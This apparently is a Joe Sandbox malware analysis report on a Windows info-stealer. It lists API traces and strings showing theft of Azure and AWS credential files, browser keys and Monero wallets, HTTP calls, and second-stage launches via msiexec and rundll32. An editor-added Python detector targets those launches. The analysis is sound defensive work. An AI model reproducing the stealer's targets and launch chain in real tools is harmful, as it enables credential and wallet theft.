                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 7798a07158b4f54e7115a3ae1663fd9ed1c0fb290952aa6e21f723208502456d
                              • Instruction ID: f8f84c774190d3a48ebe350d4d9e9e42f074e0b5fa5f101b310a06bc2f8e05fe
                              • Opcode Fuzzy Hash: 7798a07158b4f54e7115a3ae1663fd9ed1c0fb290952aa6e21f723208502456d
                              • Instruction Fuzzy Hash: 49E1D171A10209EBEB16EBA4DD94FEEB778AF64300F404169F146A71D4DF346B4ACB60
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0198BF18,00000000,00020019,00000000,010105B6), ref: 010083A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01008426
                              • wsprintfA.USER32 ref: 01008459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0100847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008499
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: a9ae3a8adf07347f0c15d3db1889bc0b6b5f72c0b1ec097e402a26a049e3bbb4
                              • Instruction ID: 815282f43472453ffd444c50c1a57fa5f1a177be22cbf322153ca7ac962fa2e8
                              • Opcode Fuzzy Hash: a9ae3a8adf07347f0c15d3db1889bc0b6b5f72c0b1ec097e402a26a049e3bbb4
                              • Instruction Fuzzy Hash: 91811D71910218DBEB65DB54DC94FEAB7B8BF58700F0082D9E18AA7180DF756B85CFA0
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 01004DCD
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 0100492C
                                • Part of subcall function 01004910: FindFirstFileA.KERNEL32(?,?), ref: 01004943
                              • lstrcat.KERNEL32(?,00000000), ref: 01004E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 01004E59
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                                • Part of subcall function 01004910: FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                                • Part of subcall function 01004910: FindClose.KERNEL32(000000FF), ref: 01004B92
                              • lstrcat.KERNEL32(?,00000000), ref: 01004EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 01004EE5
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 010049B0
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,010108D2), ref: 010049C5
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 010049E2
                                • Part of subcall function 01004910: PathMatchSpecA.SHLWAPI(?,?), ref: 01004A1E
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,0198FAD8), ref: 01004A4A
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,01010FF8), ref: 01004A5C
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,?), ref: 01004A70
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,01010FFC), ref: 01004A82
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,?), ref: 01004A96
                                • Part of subcall function 01004910: CopyFileA.KERNEL32(?,?,00000001), ref: 01004AAC
                                • Part of subcall function 01004910: DeleteFileA.KERNEL32(?), ref: 01004B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 4d5638f63ab47e2c6ec9469b03db9526254a8cf81cbd585ce7d9f8619a536af5
                              • Instruction ID: ebed4795c81b3d32d9eb2c536b3c72fd5066f39e8d56970852b4513355bdde80
                              • Opcode Fuzzy Hash: 4d5638f63ab47e2c6ec9469b03db9526254a8cf81cbd585ce7d9f8619a536af5
                              • Instruction Fuzzy Hash: 8F41B97AE4020867D765F770EC46FED3338AB24700F40459872C5A60C5EEF597C88B91
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0100906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 415050b95572761e585911cad13b38873a665f22e12842d6d37f4168eb8c7cc1
                              • Instruction ID: 4af547a6366b76bba1c82add09a2cd7ffeda826f49bb353a23aca4416b09fbb3
                              • Opcode Fuzzy Hash: 415050b95572761e585911cad13b38873a665f22e12842d6d37f4168eb8c7cc1
                              • Instruction Fuzzy Hash: AD71DC75A10208EBDB14DFE4E889FEEB7B8BF48700F148518F656E7294DB35A905CB60
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 010031C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0100335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 010034EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0ccd7d9b8c8b77fcdc1ded7926aa237540ec59925e134963ab2c733ee028801d
                              • Instruction ID: aefb370510434206e461963b7635571ed3f053a3afd1fc263a5dde29c5e9d3e7
                              • Opcode Fuzzy Hash: 0ccd7d9b8c8b77fcdc1ded7926aa237540ec59925e134963ab2c733ee028801d
                              • Instruction Fuzzy Hash: F412FD71A10209DAEB16FBA0DD91FEEB778AF24300F404169E586671D4EF742B4ACF61
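The three ShellExecuteEx call sites above, read together with the string set (`/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe`, `C:\Windows\system32\rundll32.exe`), describe a second-stage launcher: a dropped `.msi` is installed silently through msiexec, or a dropped `.dll` is run through rundll32. The following is an added detection example written by the editor, not code from the report or from the sample. It classifies constructed process-creation records (fields modelled on Sysmon Event ID 1) and flags both launch patterns when the package or DLL sits in a user-writable location. The user-writable path list, the set of silent-install switches beyond `/passive`, and the sample events are the editor's assumptions.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Tuple

# Launchers and the "/i" + "/passive" switches come from the sample's string
# set above; the rest of this file is the editor's detection logic and data.
MSIEXEC = re.compile(r"\\msiexec\.exe$", re.I)
RUNDLL32 = re.compile(r"\\rundll32\.exe$", re.I)
SILENT_FLAGS = {"/passive", "/q", "/qn", "/qb", "/quiet"}   # "/passive" is the one in the sample
# Locations an unprivileged process can write to (assumed list). A package or
# DLL staged here is the suspicious case; a vendor MSI under Program Files is not.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\Windows\\Temp\\|\\ProgramData\\",
    re.I)


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 / Security 4688 record."""
    parent_image: str
    image: str
    command_line: str


def tokenize(command_line: str) -> List[str]:
    # posix=False keeps backslashes literal and leaves the quotes on each token;
    # stripping them afterwards keeps a quoted path with spaces as one token.
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def classify(ev: ProcEvent) -> List[str]:
    findings: List[str] = []
    args = tokenize(ev.command_line)[1:]          # drop argv[0]
    lowered = [a.lower() for a in args]
    if MSIEXEC.search(ev.image) and "/i" in lowered and SILENT_FLAGS & set(lowered):
        package = next((a for a in args if a.lower().endswith(".msi")), "")
        if USER_WRITABLE.search(package) or USER_WRITABLE.search(ev.parent_image):
            findings.append("msiexec: silent install of a package staged in a user-writable path")
    if RUNDLL32.search(ev.image) and args:
        target = args[0].split(",")[0]            # rundll32 takes "<dll>,<export>"
        if target.lower().endswith(".dll") and USER_WRITABLE.search(target):
            findings.append("rundll32: DLL loaded from a user-writable path")
    return findings


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


# Constructed events: two modelled on the sample's launch strings, two benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\bob\AppData\Local\Temp\file.exe", r"C:\Windows\system32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\pkg.msi" /passive'),
    ProcEvent(r"C:\Users\bob\AppData\Local\Temp\file.exe", r"C:\Windows\system32\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe C:\Users\bob\AppData\Roaming\upd.dll,Start"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r'C:\Windows\System32\msiexec.exe /i "C:\Program Files\Vendor\tool.msi"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

The parent-image check matters for the msiexec case: the sample itself runs from a temporary directory, so even a package dropped somewhere outside the assumed path list still surfaces through the parent. For rundll32 the export name after the comma is ignored on purpose, since the stealer's strings do not show one and a missing export is itself worth a look.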
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF6280: InternetOpenA.WININET(01010DFE,00000001,00000000,00000000,00000000), ref: 00FF62E1
                                • Part of subcall function 00FF6280: StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6303
                                • Part of subcall function 00FF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                                • Part of subcall function 00FF6280: HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                                • Part of subcall function 00FF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                                • Part of subcall function 00FF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01005318
                              • lstrlen.KERNEL32(00000000), ref: 0100532F
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 01005364
                              • lstrlen.KERNEL32(00000000), ref: 01005383
                              • lstrlen.KERNEL32(00000000), ref: 010053AE
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8d8aae5b0428202a6010bae2b8075232827a8eb91b6d587d047fdae9c1afd5c5
                              • Instruction ID: ab15dc4d4060f8e36db6cea7259b9e6e2090f553181a2680b48e8a4994fbc0cb
                              • Opcode Fuzzy Hash: 8d8aae5b0428202a6010bae2b8075232827a8eb91b6d587d047fdae9c1afd5c5
                              • Instruction Fuzzy Hash: FF511B30A10249DBEB1AEF64DD95EED7778AF24301F508028E58B9B5D0DF346B0ACB61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 094ad48b42d6d98b9911d5ac33bb7cc9a52f0756d870c5b2cdbeb8c23d6b5a59
                              • Instruction ID: 4952a0f3257ef6a530c7922d5575174cc093f76321f89ae35ed1b76a4e3bad54
                              • Opcode Fuzzy Hash: 094ad48b42d6d98b9911d5ac33bb7cc9a52f0756d870c5b2cdbeb8c23d6b5a59
                              • Instruction Fuzzy Hash: 70C185B5E00219DBDB15EF60DC89FEE7378BB64304F004599E54AA7281EB70EA85CF90
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 010042EC
                              • lstrcat.KERNEL32(?,0198F280), ref: 0100430B
                              • lstrcat.KERNEL32(?,?), ref: 0100431F
                              • lstrcat.KERNEL32(?,0198D7F8), ref: 01004333
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008D90: GetFileAttributesA.KERNEL32(00000000,?,00FF1B54,?,?,0101564C,?,?,01010E1F), ref: 01008D9F
                                • Part of subcall function 00FF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D39
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 010093C0: GlobalAlloc.KERNEL32(00000000,010043DD,010043DD), ref: 010093D3
                              • StrStrA.SHLWAPI(?,0198F190), ref: 010043F3
                              • GlobalFree.KERNEL32(?), ref: 01004512
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                                • Part of subcall function 00FF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                                • Part of subcall function 00FF9AC0: LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 010044A3
                              • StrCmpCA.SHLWAPI(?,010108D1), ref: 010044C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 010044D2
                              • lstrcat.KERNEL32(00000000,?), ref: 010044E5
                              • lstrcat.KERNEL32(00000000,01010FB8), ref: 010044F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 6b2b15ef8dccc78480b78e2ad339843734f762b840a01d35e3d7ac519977189a
                              • Instruction ID: a35ab3ac6a831c0ecdf131ee52688d4395546116fd0ec4531d64a1697f7b8be7
                              • Opcode Fuzzy Hash: 6b2b15ef8dccc78480b78e2ad339843734f762b840a01d35e3d7ac519977189a
                              • Instruction Fuzzy Hash: 1B7174B6900208ABDB15FBA4EC89FEE7378BB48300F048598E64597185EB75D749CF91
                              APIs
                                • Part of subcall function 00FF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF12B4
                                • Part of subcall function 00FF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF12BB
                                • Part of subcall function 00FF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FF12D7
                                • Part of subcall function 00FF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FF12F5
                                • Part of subcall function 00FF12A0: RegCloseKey.ADVAPI32(?), ref: 00FF12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00FF134F
                              • lstrlen.KERNEL32(?), ref: 00FF135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00FF1377
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FF1465
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00FF14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
